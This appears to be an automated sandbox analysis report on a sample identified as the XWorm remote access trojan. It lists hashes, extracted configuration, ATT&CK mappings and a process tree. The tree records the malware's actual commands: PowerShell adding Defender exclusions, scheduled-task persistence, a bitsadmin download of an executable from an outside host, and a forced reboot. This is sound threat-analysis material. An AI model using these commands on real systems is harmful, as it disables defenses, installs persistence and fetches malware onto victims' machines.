Overview

overview

10

Static

static

3

PhantomCrypter.exe

windows7-x64

PhantomCrypter.exe

windows10-2004-x64

10

Analysis

  • max time kernel
    37s
  • max time network
    38s
  • platform
    windows7_x64
  • resource
    win7-20240903-en
  • resource tags

    arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
  • submitted
    22-01-2025 03:49

Sharing

Copy URL
Twitter E-mail

Errors

Reason
Machine shutdown
Report Analysis Logs

General

  • Target

    PhantomCrypter.exe

  • Size

    5.0MB

  • MD5

    d4d28f2c6fd9af9ee5a3be30f9ab913b

  • SHA1

    be4264bceaff957ff799b73ebc2479f0fc794815

  • SHA256

    c69d8df82357c95fe43db40465d0169ea8e0feacd8a3e4debe87865544100d9e

  • SHA512

    7eed5b6d3420c930a07aee500e086ec61fd33099cd641a2efe7664081c0e5fdab4d1ad2b4835edcbe3e6722d44e60a75119a2900cfd00b7c182b20f379d7a977

  • SSDEEP

    98304:6l1z3/RZ58MoFyQbbpaR2p1AU6cBSdOWWzSPfEIeGLGIQaW5tqwZ0ch1+NXHKgv3:Y1z5Z58MQJe2PAU6cBSkWWzaETGDW/t

Score
10/10
xwormdiscoverydropperexecutionpersistencerattrojan

Malware Config

Extracted

Family

xworm

Version

5.0

Mutex

EEarXqazEvX73BCq

Attributes
  • Install_directory

    %AppData%

  • install_file

    Chrome Update.exe

  • pastebin_url

    https://pastebin.com/raw/RPPi3ByL

aes.plain
aes.plain
aes.plain

Signatures

  • Detect Xworm Payload 6 IoCs
  • Xworm

    Xworm is a remote access trojan written in C#.

    trojanratxworm
  • Xworm family
    xworm
  • Command and Scripting Interpreter: PowerShell 1 TTPs 12 IoCs

    Run Powershell to modify Windows Defender settings to add exclusions for file extensions, paths, and processes.

    execution
  • Download via BitsAdmin 1 TTPs 1 IoCs
    dropper
  • Drops startup file 6 IoCs
  • Executes dropped EXE 4 IoCs
  • Adds Run key to start application 2 TTPs 2 IoCs
    persistence
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 25 IoCs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • System Location Discovery: System Language Discovery 1 TTPs 4 IoCs

    Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

    discovery
  • Modifies Internet Explorer settings 1 TTPs 1 IoCs
    adwarespyware
  • Scheduled Task/Job: Scheduled Task 1 TTPs 3 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

    persistenceexecution
  • Suspicious behavior: EnumeratesProcesses 14 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious use of AdjustPrivilegeToken 18 IoCs
  • Suspicious use of FindShellTrayWindow 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

    persistence

Processes

  • C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe
    "C:\Users\Admin\AppData\Local\Temp\PhantomCrypter.exe"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2980
    • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
      "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2472
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2596
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1708
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:608
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'Chrome Update.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1296
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "Chrome Update" /tr "C:\Users\Admin\AppData\Roaming\Chrome Update.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2992
    • C:\Windows\SysWOW64\mshta.exe
      "C:\Windows\SysWOW64\mshta.exe" "C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta"
      2⤵
      • System Location Discovery: System Language Discovery
      • Modifies Internet Explorer settings
      • Suspicious use of WriteProcessMemory
      PID:1920
      • C:\Windows\SysWOW64\bitsadmin.exe
        "C:\Windows\System32\bitsadmin.exe" /transfer 8 https://spyderrock.com/xkdg5397-run.exe C:\Users\Admin\AppData\Local\Temp\Notify.exe
        3⤵
        • Download via BitsAdmin
        • System Location Discovery: System Language Discovery
        PID:2672
    • C:\Users\Admin\AppData\Roaming\msedge.exe
      "C:\Users\Admin\AppData\Roaming\msedge.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2504
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2624
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1972
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1028
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'msedge.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1720
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "msedge" /tr "C:\Users\Admin\AppData\Local\msedge.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:1704
    • C:\Users\Admin\AppData\Roaming\OneDrive.exe
      "C:\Users\Admin\AppData\Roaming\OneDrive.exe"
      2⤵
      • Drops startup file
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of WriteProcessMemory
      PID:2160
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2368
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:1712
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\ProgramData\OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2436
      • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
        "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionProcess 'OneDrive.exe'
        3⤵
        • Command and Scripting Interpreter: PowerShell
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:304
      • C:\Windows\System32\schtasks.exe
        "C:\Windows\System32\schtasks.exe" /create /f /RL HIGHEST /sc minute /mo 1 /tn "OneDrive" /tr "C:\ProgramData\OneDrive.exe"
        3⤵
        • Scheduled Task/Job: Scheduled Task
        PID:2308
    • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
      "C:\Users\Admin\AppData\Roaming\TOPHERC.exe"
      2⤵
      • Executes dropped EXE
      • System Location Discovery: System Language Discovery
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious behavior: GetForegroundWindowSpam
      • Suspicious use of AdjustPrivilegeToken
      • Suspicious use of FindShellTrayWindow
      PID:2688
      • C:\Windows\SysWOW64\shutdown.exe
        "C:\Windows\System32\shutdown.exe" -r -t 00
        3⤵
        • System Location Discovery: System Language Discovery
        • Suspicious use of AdjustPrivilegeToken
        PID:2296
  • C:\Windows\system32\LogonUI.exe
    "LogonUI.exe" /flags:0x0
    1⤵
      PID:1248
    • C:\Windows\system32\LogonUI.exe
      "LogonUI.exe" /flags:0x1
      1⤵
        PID:1068

      Network

      MITRE ATT&CK Enterprise v15

      Reconnaissance

      Resource Development

      Initial Access

      Execution

      Command and Scripting Interpreter

      1
      T1059

      PowerShell

      1
      T1059.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Persistence

      BITS Jobs

      1
      T1197

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Privilege Escalation

      Boot or Logon Autostart Execution

      1
      T1547

      Registry Run Keys / Startup Folder

      1
      T1547.001

      Scheduled Task/Job

      1
      T1053

      Scheduled Task

      1
      T1053.005

      Defense Evasion

      BITS Jobs

      1
      T1197

      Modify Registry

      2
      T1112

      Credential Access

      Discovery

      Query Registry

      1
      T1012

      System Information Discovery

      1
      T1082

      System Location Discovery

      1
      T1614

      System Language Discovery

      1
      T1614.001

      Lateral Movement

      Collection

      Command and Control

      Web Service

      1
      T1102

      Exfiltration

      Impact

      Replay Monitor

      Loading Replay Monitor...

      Downloads

      • C:\Users\Admin\AppData\Roaming\Chrome Update.exe
        Filesize

        152KB

        MD5

        16cdd301591c6af35a03cd18caee2e59

        SHA1

        92c6575b57eac309c8664d4ac76d87f2906e8ef3

        SHA256

        11d55ac2f9070a70d12f760e9a6ee75136eca4bf711042acc25828ddda3582c8

        SHA512

        a44402e5e233cb983f7cfd9b81bc542a08d8092ffa4bd970fc25fe112355643506d5dfee0dd76f2e79b983df0fde67bfc50aabb477492a7596e38081e4083476

        Download Submit

      • C:\Users\Admin\AppData\Roaming\DownloaderLuc.hta
        Filesize

        844B

        MD5

        3f8a283abe6fe28a7d217c8105041426

        SHA1

        0283cd67e7cc0a99eeae3c3dea69716a6ac75bb1

        SHA256

        333c439c84ccbcab11dd9cc7f4d90596c5b65caf1164e8a908e61aa0222916b1

        SHA512

        bc5f8f256356c689953516877f8b7895fb1efe587feabdddf0e1524d0b22e3dcb89e0e654d19d0c314c6a376a0e7594965178a353d147ea98c43d3d5976f1846

        Download Submit

      • C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
        Filesize

        7KB

        MD5

        8cfe4aa907a50b307b0d5781ebc601d2

        SHA1

        feb6ff210864853f60c4341436fbee2f092df1ee

        SHA256

        3d843d4bee9fba24d59a708805f8fef16ee10eb712e0f3136d83f87196a8bc96

        SHA512

        412bc07488897e8064215f92ef812272d9579522afd02a04d9cbdd42dfeaa0754d3a433a1618294e414fc26766faa696e05e154df3be236fa2e73064d031e1c3

        Download Submit

      • C:\Users\Admin\AppData\Roaming\OneDrive.exe
        Filesize

        140KB

        MD5

        a1cd6f4a3a37ed83515aa4752f98eb1d

        SHA1

        7f787c8d72787d8d130b4788b006b799167d1802

        SHA256

        5cbcc0a0c1d74cd54ac999717b0ff0607fe6ed02cca0a3e0433dd94783cfec65

        SHA512

        9489287e0b4925345fee05fe2f6e6f12440af1425ef397145e32e6f80c7ae98b530e42002d92dc156643f9829bc8a3b969e855cecd2265b6616c4514eed00355

        Download Submit

      • C:\Users\Admin\AppData\Roaming\TOPHERC.exe
        Filesize

        4.2MB

        MD5

        79f2fd33a188ff47216b4f4dd4552582

        SHA1

        16e40e0a1fed903fec20cd6cd600e3a2548881ad

        SHA256

        cc45d38fa00c5aeb33bdf842166460117b5e70b0b4fcf5bb6ef9747ec0b0575f

        SHA512

        caa33702fdc7e480a6093d2af035f860044a4e960fd6e5a4b91d6019f2c3d4c235d9e95734e6b54ea2a88af4e96bf72a54d81b2a70c1f64e76dcd202891905f2

        Download Submit

      • C:\Users\Admin\AppData\Roaming\msedge.exe
        Filesize

        166KB

        MD5

        aee20d80f94ae0885bb2cabadb78efc9

        SHA1

        1e82eba032fcb0b89e1fdf937a79133a5057d0a1

        SHA256

        498eb55b3fb4c4859ee763a721870bb60ecd57e99f66023b69d8a258efa3af7d

        SHA512

        3a05ff32b9aa79092578c09dfe67eaca23c6fe8383111dab05117f39d91f27670029f39482827d191bd6a652483202b8fc1813f8d5a0f3f73fd35ca37a4f6d42

        Download Submit

      • memory/1720-111-0x0000000001EB0000-0x0000000001EB8000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1720-110-0x000000001B690000-0x000000001B972000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/1972-71-0x0000000001E00000-0x0000000001E08000-memory.dmp

        Filesize

        32KB

        Download

      • memory/1972-70-0x000000001B640000-0x000000001B922000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2160-22-0x0000000000190000-0x00000000001B8000-memory.dmp

        Filesize

        160KB

        Download

      • memory/2472-9-0x0000000000AF0000-0x0000000000B1C000-memory.dmp

        Filesize

        176KB

        Download

      • memory/2472-123-0x000007FEF5CD0000-0x000007FEF66BC000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2472-30-0x000007FEF5CD0000-0x000007FEF66BC000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2472-122-0x000007FEF5CD0000-0x000007FEF66BC000-memory.dmp

        Filesize

        9.9MB

        Download

      • memory/2504-21-0x0000000000E70000-0x0000000000E9E000-memory.dmp

        Filesize

        184KB

        Download

      • memory/2596-35-0x000000001B660000-0x000000001B942000-memory.dmp

        Filesize

        2.9MB

        Download

      • memory/2596-41-0x0000000001E90000-0x0000000001E98000-memory.dmp

        Filesize

        32KB

        Download

      • memory/2688-29-0x00000000013B0000-0x00000000017E8000-memory.dmp

        Filesize

        4.2MB

        Download

      • memory/2980-0-0x000007FEF5CD3000-0x000007FEF5CD4000-memory.dmp

        Filesize

        4KB

        Download

      • memory/2980-1-0x00000000002E0000-0x00000000007E8000-memory.dmp

        Filesize

        5.0MB

        Download